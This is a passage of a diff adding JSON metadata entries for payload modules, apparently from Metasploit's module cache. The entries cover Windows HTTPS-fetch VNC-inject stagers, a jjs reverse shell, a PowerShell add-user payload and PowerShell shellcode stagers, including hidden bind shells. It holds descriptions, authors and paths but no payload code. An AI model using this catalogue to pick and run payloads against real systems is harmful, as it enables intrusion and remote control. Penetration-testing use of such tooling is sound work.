+ "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/https/x64/vncinject/bind_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/https/x64/vncinject/bind_tcp": { + "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/https/x64/vncinject/bind_tcp_rc4": { + "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/https/x64/vncinject/bind_tcp_uuid": { + "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_http": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_https": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_https", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_tcp_rc4": { + "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_winhttp": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_winhttps": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/jjs_reverse_tcp": { + "name": "Windows Shell, Reverse TCP (via jjs)", + "fullname": "payload/cmd/windows/jjs_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "conerpirate", + "bcoles " + ], + "description": "Connect back and create a command shell via jjs", + "references": [ + "URL-https://gtfobins.github.io/gtfobins/jjs/", + "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", + "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "cmd/windows/jjs_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/powershell/adduser": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "hdm ", + "Chris John Riley", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/adduser", + "staged": false + }, + "payload_cmd/windows/powershell/custom/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/custom/bind_hidden_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/custom/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/custom/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/custom/bind_named_pipe": { + "name": "Powershell Exec, Windows shellcode stage, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/custom/bind_nonx_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/custom/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/custom/bind_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/custom/bind_tcp_rc4": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/custom/bind_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/custom/find_tag": { + "name": "Powershell Exec, Windows shellcode stage, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/custom/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/find_tag", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/custom/reverse_http": { + "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_http", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_http" + }, + "payload_cmd/windows/powershell/custom/reverse_http_proxy_pstore": { + "name": "Powershell Exec, Windows shellcode stage, Reverse HTTP Stager Proxy", + "fullname": "payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + 